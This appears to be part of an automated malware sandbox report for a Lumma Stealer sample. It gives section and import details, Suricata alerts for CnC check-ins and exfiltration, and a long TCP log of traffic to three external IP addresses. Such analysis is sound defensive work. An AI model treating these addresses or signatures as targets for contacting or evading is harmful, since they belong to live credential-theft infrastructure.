                                                                                                                                            .taggant0x2fa0000x30000x2200abaf91da0920772d5551ad688b1e7416False0.06709558823529412DOS executable (COM)0.7410428645303748IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                            Imports

                                                                                                                                            DLLImport
                                                                                                                                            kernel32.dlllstrcpy

                                                                                                                                            Network Behavior

                                                                                                                                            Suricata IDS Alerts

                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                            2024-12-23T17:20:20.332106+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049707104.21.36.201443TCP
                                                                                                                                            2024-12-23T17:20:21.088275+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.1049707104.21.36.201443TCP
                                                                                                                                            2024-12-23T17:20:21.088275+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049707104.21.36.201443TCP
                                                                                                                                            2024-12-23T17:20:22.413487+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049708104.21.36.201443TCP
                                                                                                                                            2024-12-23T17:20:23.265224+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.1049708104.21.36.201443TCP
                                                                                                                                            2024-12-23T17:20:23.265224+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049708104.21.36.201443TCP
                                                                                                                                            2024-12-23T17:20:25.340919+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049719104.21.36.201443TCP
                                                                                                                                            2024-12-23T17:20:26.685185+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.1049719104.21.36.201443TCP
                                                                                                                                            2024-12-23T17:20:28.045455+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049725104.21.36.201443TCP
                                                                                                                                            2024-12-23T17:20:30.830667+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049731104.21.36.201443TCP
                                                                                                                                            2024-12-23T17:20:33.685026+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049738104.21.36.201443TCP
                                                                                                                                            2024-12-23T17:20:36.221414+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049749104.21.36.201443TCP
                                                                                                                                            2024-12-23T17:20:41.504421+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049762104.21.36.201443TCP
                                                                                                                                            2024-12-23T17:20:42.271988+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049762104.21.36.201443TCP
                                                                                                                                            2024-12-23T17:20:44.012855+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049768185.166.143.49443TCP
                                                                                                                                            2024-12-23T17:20:46.351193+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.10497743.5.25.145443TCP

                                                                                                                                            Network Port Distribution

                                                                                                                                            TCP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Dec 23, 2024 17:20:19.102232933 CET49707443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:19.102296114 CET44349707104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:19.102371931 CET49707443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:19.103965044 CET49707443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:19.103992939 CET44349707104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:20.332005024 CET44349707104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:20.332106113 CET49707443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:20.334747076 CET49707443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:20.334777117 CET44349707104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:20.335222006 CET44349707104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:20.387223005 CET49707443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:20.395225048 CET49707443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:20.395402908 CET49707443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:20.395428896 CET44349707104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:21.088279009 CET44349707104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:21.088414907 CET44349707104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:21.088474035 CET49707443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:21.140594959 CET49707443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:21.140633106 CET44349707104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:21.140666962 CET49707443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:21.140675068 CET44349707104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:21.194097042 CET49708443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:21.194155931 CET44349708104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:21.194217920 CET49708443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:21.194618940 CET49708443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:21.194633961 CET44349708104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:22.413403988 CET44349708104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:22.413486958 CET49708443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:22.414680004 CET49708443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:22.414689064 CET44349708104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:22.415039062 CET44349708104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:22.416219950 CET49708443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:22.416307926 CET49708443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:22.416327953 CET44349708104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:23.265248060 CET44349708104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:23.265305996 CET44349708104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:23.265345097 CET44349708104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:23.265362978 CET49708443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:23.265392065 CET44349708104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:23.265440941 CET49708443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:23.265446901 CET44349708104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:23.265461922 CET44349708104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:23.265508890 CET49708443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:23.273308992 CET44349708104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:23.281737089 CET44349708104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:23.281790018 CET49708443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:23.281801939 CET44349708104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:23.290360928 CET44349708104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:23.290421009 CET49708443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:23.290442944 CET44349708104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:23.340352058 CET49708443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:23.384859085 CET44349708104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:23.434107065 CET49708443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:23.456903934 CET44349708104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:23.460771084 CET44349708104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:23.460813046 CET44349708104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:23.460830927 CET49708443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:23.460856915 CET44349708104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:23.460907936 CET49708443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:23.460918903 CET44349708104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:23.460937023 CET44349708104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:23.460983038 CET49708443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:23.461082935 CET49708443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:23.461101055 CET44349708104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:23.461117029 CET49708443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:23.461123943 CET44349708104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:24.127713919 CET49719443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:24.127759933 CET44349719104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:24.127830982 CET49719443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:24.128110886 CET49719443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:24.128117085 CET44349719104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:25.340770960 CET44349719104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:25.340919018 CET49719443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:25.342259884 CET49719443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:25.342271090 CET44349719104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:25.342542887 CET44349719104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:25.343828917 CET49719443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:25.344372988 CET49719443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:25.344402075 CET44349719104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:26.685192108 CET44349719104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:26.685295105 CET44349719104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:26.685498953 CET49719443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:26.685579062 CET49719443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:26.685600042 CET44349719104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:26.830883980 CET49725443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:26.830935955 CET44349725104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:26.831008911 CET49725443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:26.831362009 CET49725443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:26.831372023 CET44349725104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:28.045331955 CET44349725104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:28.045454979 CET49725443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:28.046757936 CET49725443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:28.046770096 CET44349725104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:28.047028065 CET44349725104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:28.048268080 CET49725443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:28.048382998 CET49725443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:28.048418999 CET44349725104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:28.048476934 CET49725443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:28.048485041 CET44349725104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:29.033740044 CET44349725104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:29.033838034 CET44349725104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:29.033904076 CET49725443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:29.034029007 CET49725443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:29.034043074 CET44349725104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:29.615683079 CET49731443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:29.615755081 CET44349731104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:29.615840912 CET49731443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:29.616168022 CET49731443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:29.616187096 CET44349731104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:30.830598116 CET44349731104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:30.830667019 CET49731443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:30.832223892 CET49731443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:30.832242966 CET44349731104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:30.832525015 CET44349731104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:30.833853960 CET49731443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:30.833981991 CET49731443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:30.834009886 CET44349731104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:30.834146976 CET49731443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:30.834156990 CET44349731104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:32.103751898 CET44349731104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:32.103857994 CET44349731104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:32.103929043 CET49731443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:32.104093075 CET49731443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:32.104111910 CET44349731104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:32.471092939 CET49738443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:32.471143007 CET44349738104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:32.471224070 CET49738443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:32.471564054 CET49738443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:32.471573114 CET44349738104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:33.684950113 CET44349738104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:33.685025930 CET49738443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:33.686351061 CET49738443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:33.686363935 CET44349738104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:33.686641932 CET44349738104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:33.688034058 CET49738443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:33.688139915 CET49738443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:33.688146114 CET44349738104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:34.460675955 CET44349738104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:34.460774899 CET44349738104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:34.460827112 CET49738443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:34.460998058 CET49738443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:34.461014032 CET44349738104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:35.003038883 CET49749443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:35.003089905 CET44349749104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:35.003151894 CET49749443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:35.003536940 CET49749443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:35.003551960 CET44349749104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:36.221338034 CET44349749104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:36.221414089 CET49749443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:36.230011940 CET49749443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:36.230056047 CET44349749104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:36.230403900 CET44349749104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:36.232294083 CET49749443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:36.233220100 CET49749443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:36.233258009 CET44349749104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:36.233355999 CET49749443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:36.233374119 CET44349749104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:36.233582020 CET49749443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:36.233611107 CET44349749104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:36.233756065 CET49749443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:36.233783960 CET44349749104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:36.233936071 CET49749443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:36.233963966 CET44349749104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:36.234606028 CET49749443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:36.234635115 CET44349749104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:36.234647036 CET49749443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:36.234662056 CET44349749104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:36.234796047 CET49749443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:36.234821081 CET44349749104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:36.234849930 CET49749443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:36.235035896 CET49749443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:36.235069036 CET49749443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:36.275340080 CET44349749104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:36.275516033 CET49749443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:36.275544882 CET44349749104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:36.275573015 CET49749443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:36.275590897 CET44349749104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:36.275603056 CET49749443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:36.275609970 CET44349749104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:36.275662899 CET49749443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:36.275677919 CET44349749104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:40.193531990 CET44349749104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:40.193767071 CET44349749104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:40.193820000 CET49749443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:40.194014072 CET49749443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:40.194036007 CET44349749104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:40.284765005 CET49762443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:40.284811974 CET44349762104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:40.284877062 CET49762443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:40.285223007 CET49762443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:40.285238028 CET44349762104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:41.504241943 CET44349762104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:41.504420996 CET49762443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:41.507085085 CET49762443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:41.507100105 CET44349762104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:41.507414103 CET44349762104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:41.516494989 CET49762443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:41.516532898 CET49762443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:41.516601086 CET44349762104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:42.272018909 CET44349762104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:42.272325039 CET44349762104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:42.272422075 CET49762443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:42.272684097 CET49762443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:42.272684097 CET49762443192.168.2.10104.21.36.201
                                                                                                                                            Dec 23, 2024 17:20:42.272707939 CET44349762104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:42.272716045 CET44349762104.21.36.201192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:42.417912960 CET49768443192.168.2.10185.166.143.49
                                                                                                                                            Dec 23, 2024 17:20:42.417959929 CET44349768185.166.143.49192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:42.418031931 CET49768443192.168.2.10185.166.143.49
                                                                                                                                            Dec 23, 2024 17:20:42.418538094 CET49768443192.168.2.10185.166.143.49
                                                                                                                                            Dec 23, 2024 17:20:42.418546915 CET44349768185.166.143.49192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:44.012778044 CET44349768185.166.143.49192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:44.012855053 CET49768443192.168.2.10185.166.143.49
                                                                                                                                            Dec 23, 2024 17:20:44.015619993 CET49768443192.168.2.10185.166.143.49
                                                                                                                                            Dec 23, 2024 17:20:44.015641928 CET44349768185.166.143.49192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:44.016139030 CET44349768185.166.143.49192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:44.017725945 CET49768443192.168.2.10185.166.143.49
                                                                                                                                            Dec 23, 2024 17:20:44.059365034 CET44349768185.166.143.49192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:44.699253082 CET44349768185.166.143.49192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:44.699357033 CET44349768185.166.143.49192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:44.699501991 CET49768443192.168.2.10185.166.143.49
                                                                                                                                            Dec 23, 2024 17:20:44.699505091 CET44349768185.166.143.49192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:44.699563980 CET49768443192.168.2.10185.166.143.49
                                                                                                                                            Dec 23, 2024 17:20:44.699846983 CET49768443192.168.2.10185.166.143.49
                                                                                                                                            Dec 23, 2024 17:20:44.699870110 CET44349768185.166.143.49192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:44.699882984 CET49768443192.168.2.10185.166.143.49
                                                                                                                                            Dec 23, 2024 17:20:44.699888945 CET44349768185.166.143.49192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:44.927917004 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:44.927975893 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:44.928040028 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:44.928631067 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:44.928647995 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:46.351074934 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:46.351192951 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:46.352901936 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:46.352922916 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:46.353256941 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:46.354567051 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:46.399339914 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:46.834294081 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:46.887279034 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:46.889406919 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:46.889446974 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:46.889477968 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:46.889484882 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:46.889538050 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:46.889547110 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:46.889564991 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:46.889590979 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:46.889602900 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:46.889630079 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:46.889641047 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:46.889714003 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:46.934182882 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:47.062393904 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:47.062418938 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:47.062520027 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:47.062527895 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:47.062541008 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:47.062593937 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:47.062604904 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:47.106003046 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:47.108685970 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:47.108725071 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:47.108778000 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:47.108792067 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:47.108810902 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:47.108843088 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:47.108850002 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:47.108916044 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:47.113658905 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:47.113756895 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:47.113812923 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:47.113821030 CET443497743.5.25.145192.168.2.10
